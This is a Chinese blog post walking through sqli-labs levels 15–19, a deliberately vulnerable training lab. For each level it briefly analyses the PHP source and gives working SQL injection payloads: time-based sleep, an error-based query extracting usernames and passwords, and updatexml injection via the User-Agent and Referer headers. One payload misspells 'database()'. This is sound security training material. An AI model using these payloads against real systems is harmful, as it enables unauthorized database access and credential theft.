sqli-labs(15-19关)笔记

最新推荐文章于 2024-05-06 15:38:01 发布
最新推荐文章于 2024-05-06 15:38:01 发布
阅读量2.8k 收藏 2
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65441499/article/details/124234115
版权

15关

查看源码如下:

这里看护出是用post提交的参数,用单引号闭合

 

把回显报错给注释掉了,现在得知我们只能用延时注入,试一下简单的看会不会延时

 

 输入时间盲注payload,注入成功

uname=admin' and sleep(5)%23

16关

分析源代码:

和15关一样的post提交

但是这里换成了“闭合方式 

 同样注释了mysql的回显报错,用上局的payload闭合方式换成”测试一下

成功睡了5秒 ,下面是payload

uname=admin") and sleep(5)%23

 17关

首先简单源码分析:

post提交,在这里 设置了过滤参数,但是passwd没有

magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,在magic_quotes_gpc = On的情况下,如果输入的数据有单引号(’)、双引号(”)、反斜线(\)与 NULL(NULL 字符)等字符都会被加上反斜线。

使用单引号闭合 

 这里报错了,会echo出来,那我们直接就可以尝试一下报错注入,从passwd入手

 使用报错注入成功,下面是payload

uname=admin&passwd=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(0x7e,CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)%23

18关

查看源代码:

同样的post提交方式

 

对我们提交两个参数都进行了过滤 

这里 获取请求的 uagent 和 IP地址

 insert语句这里 ip_address 和 uagent 使用单引号拼接,并且没有设置过滤

输出$uagent

并输出了mysql的报错信息,可以尝试报错注入,延时注入

payload

1' and updatexml(1,concat(0x7e,(select datebase()),0x7e),1) and '%23

19关

依然是post提交

 

对两个参数进行过滤

 

输出 $_server['http_referer']

本关和 Less-18 异曲同工,只是这里的漏洞点出在了 referer 里面,其他利用方式基本上也是一毛一样,所以下面直接上 payload 演示吧:

 

 1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '%23

 

 

呼呼呼~
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第十五和十六(post请求-布尔盲注)
qq_42266432的博客
08-26 855
开启第十五,先尝试注入,注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本,脚本的思路和之前使用布尔盲注的卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
sqli-labs靶场15-19笔记
weixin_62884797的博客
04-16 718
15 我们按照老办法,输入单引号查看回显信息,但没有到没有,显然,他极有可能是无回显报错,那就是盲注了。 先bp抓包 发现他是post的请求,我们就在bp中改包注入一下 admin' and 1=1 23% 发现登陆成功,确实有注入点,但是无回显,我们就需要盲注了。 uname=admin' and sleep(5) 23%&passwd=admin&submit=Submit 在bp中,我们等了一会儿他回显的,我们可以确定,可以使用时间盲注了。 uname=adm
sqli-labs第十五
yuqnqi的博客
05-09 868
我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。在尝试之后,联合查询和报错注入方式后无果,我们初步判断为盲注。正确的时候可以直接登录,不正确的时候这里会延时 5 秒。页面无回显,单靠页面无法判断闭合方式,所以得查看源码。本属于时间注入,基于源码分析,闭合字符是单引号。最后就是猜数据库表和猜数据库了,这里就不在叙述了。看这延迟5秒中,说明猜想数据库8位正确。
SQLI-labs-第十五和第十六
最新发布
weixin_54055099的博客
05-06 891
Sqlilab的第十五和十六,时间盲注
sqli-labs的第15的布尔脚本(附代码分析)
skoyine的博客
05-02 1463
sqli-labs的第15布尔盲注脚本 因为最近在复习python,所以找个项目练练手,本人是个菜鸡,代码哪里有问题欢迎大佬指出 import requests import time host = "http://127.0.0.1/sqli-labs/Less-15/" def getDatabase(): # 获取数据库名 global host ans = '' # 最外面的循环是数据库名的字符长度,就是从第几个字符开始
[网络安全]sqli-labs Less-15 解题详析
等风来
07-24 2464
以上为[网络安全]sqli-labs Less-15 解题详析,后续将分享[网络安全]sqli-labs Less-16 解题详析我是秋说,我们下次见。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs(15-19
weixin_55843787的博客
04-16 3048
sqli-labs靶场过 源码分析
Sqli-labs靶场第15详解[Sqli-labs-less-15]自动化注入-SQLmap工具注入
m0_73615178的博客
03-02 775
由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。
sqli-labs/Less-15
m0_71299382的博客
11-18 500
sqli-labs第十五
2020.4.4 sqli-labs--第十五、十六
DSR446的博客
04-04 434
less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注) 方法一 盲注 - 基于布尔值 - 字符串 怎么输入都没有回显,那就时间延迟吧。 布尔测试payload uname=admin' and 1=1 --+&passwd=admin&submit=Submit //登...
sqli-labs练习(十五、十六)
wkend的博客
07-27 1464
sqli-labs练习(十五)— POST-Bind-Boolean/time Based-Single quotes 同样,使用万能密码即可登录成功,进过几次注入尝试发现是基于布尔型的盲注。 万能密码:123' or 1=1#,即可登录成功。 基于布尔型的sql注入稍微麻烦,因为要不断的测试,根据页面的反应来猜测后台数据库信息。 下面直接放payload:uname=1' or (s...
sqli-libs基础篇总结(1-22)
qq_33557485的博客
08-15 2420
1.sqli-labs 这个是sql注入的靶场。可以在git上下载。 2.题目简介 前面的1-22题都是sql注入的基础题目。覆盖范围很广,不过都是针对mysql数据库的。 1-4题:union注入 5-8题:布尔盲注 9-10题:延时盲注 11-12题:post形式的显错注入 13-16题:post形式的布尔盲注 17题:update语句的显错注入 18-19题:htt...
SQL : 练习题-15
weixin_44523387的博客
07-14 149
按各科成绩进行排序,并显示排名, Score 重复时保留名次空缺 这一道题有点tricky,可以用变量,但也有更为简单的方法,即自交(左交) 用sc中的score和自己进行对比,来计算“比当前分数高的分数有几个”。 select a.cid, a.sid, a.score, count(b.score)+1 as rank from sc as a left join sc as b on a...
sqli-labs靶场Less-15
songling515010475的专栏
08-26 229
1、访问首页,/Less-15/index.php,这里的传参点是表单中的uname、passwd 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入 分析:这里同时存在布尔型(延时)注入,哪这里可以使用盲注 或 延时盲注来做这个题。 2、使用盲注获取数据库长度 -- 盲注 admin' and length(databa...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是于MySQL注入技术的详细指南,特别注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相知识。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值